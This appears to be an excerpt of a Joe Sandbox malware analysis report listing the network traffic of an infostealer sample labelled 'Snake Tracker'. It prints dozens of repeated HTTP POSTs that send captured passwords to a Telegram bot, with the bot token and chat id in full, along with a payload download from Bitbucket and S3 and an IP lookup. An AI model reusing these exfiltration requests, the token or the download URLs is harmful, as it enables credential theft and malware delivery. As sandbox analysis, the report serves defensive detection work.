            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e2afe1517dcHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dc19c90c343Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0de89fac7a38Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e5dbbcfced3Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dcf5032218bHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dfed0e58a0dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e74ea27430bHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0de86b2c0ccfHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e1651b783f6Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e8c046fa382Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e000d88a51dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e2c5dc4481cHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ea1aff451e4Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e18ff2f9f9eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e3f97e51cd2Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0eb5ee92c4e0Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e2c53de666fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e58399bf1a8Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ecccaf1fdd6Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e425aa9301bHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ee23a537a0eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e6f6632ec55Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e633f512fcfHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0efa41ff69d7Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e867d773907Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e7d2eac84a9Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ea18e3d18a2Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f14dc5e3fefHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e97064f676eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0eb3179c3f7fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f28be95a5fbHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0eab5a499b52Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ec9f12dbdf1Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f4082f33a4cHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ec250d2c789Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f519f0d5ca3Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ede0895058aHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f08a8cc2626Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ef55334ac8aHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f7f6e69a05fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f1ddc04ff5aHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f982ba92d5dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f0c03271772Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f1e9f0c802fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fab9e050937Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f2f0420657eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f35250cf7bbHost: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fc80cbc88b2Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f440fe0220dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f4ce99ede20Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f5908777d5bHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fe461bde220Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f63476ff6d9Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f6f3c5dd29eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10047244b21aHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f76f31b176fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f82c2b37b8eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd101cbc07fa5fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f8fc54b4863Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: unknown | DNS query: name: checkip.dyndns.org
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 16.182.70.225:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 185.166.143.48:443
            Source: global traffic | HTTP traffic detected: GET /ntim1478/gpmaw/downloads/240_Cobsfhiygmx HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-4526-ae33-7a2e4ade5334/240_Cobsfhiygmx?response-content-disposition=attachment%3B%20filename%3D%22240_Cobsfhiygmx%22&AWSAccessKeyId=ASIA6KOSE3BNDW6O2X3G&Signature=2chtfxoFxVQH%2B%2Bqk1LYozF4rZ%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAD1NYAHfsojP08kbtMfuAOMGAEvCe3UKQ8UuqEcK7AUAiBLFY8fCNgsv5yXRVa1b5QNwmml9rALfaMKgd8jdopQyyqnAggoEAAaDDk4NDUyNTEwMTE0NiIMfAZ8Us6gNEO9lXe4KoQC4H3JCLPChoPHuNq8eVCV0VMfd0IICdqgHHTSS7ANzAU4dth3BBqgfGziNIRR91nsxqTwbAAkR9UbQFCz06yniB%2BRGncxwoJCSnWAnC0PMUZxzU%2B%2BmfP%2FabATRJ9BblkOl1DPLVzf%2FJK1O6swKVUCdmPXu9Jkpx0Zs3JpqA2SUfKf9kMOAbhud5%2B1kxcQ6T7uVBLz8q4gm46LDNyHkSdwPE%2FQPgP3oIs4bSwQ5TMxJgIO5MbAPud6%2Bz%2FVgFMzq8rBGnCYT%2F4UbUFOLOxmP7f%2FDVGr5XggPH5IbOKF9s2N5SU%2B%2B%2BFpTKfe55tJ6Uv%2BfHOKA0oQO%2BP7Wdzhn3fln1%2B7PoGjL2cwk%2BqVugY6ngGYCJOQQCMy7ggWig9zh2r3BmXcbjQcgkcKcTBPK9af%2FavWTGfdHkiCsWui9miH9txKAmMYOb08nXhpPgiwJXBhhGW9aVZgTRRjdb2Sv%2FPIWSb4mnaUlx07x5vLgIpzF7bcB%2BXCGAwY9Fu1PDZraBoc98lDjGKEsMeyI4ZoviGm%2Fw7CfZ%2BnLixdbdCHlHxYrlVAS%2BUU8DDCuagK%2FZVUiA%3D%3D&Expires=1732607003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
            Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: unknown | HTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0dc18a308c59 Host: api.telegram.org Content-Length: 537 Connection: Keep-Alive
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034D60000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 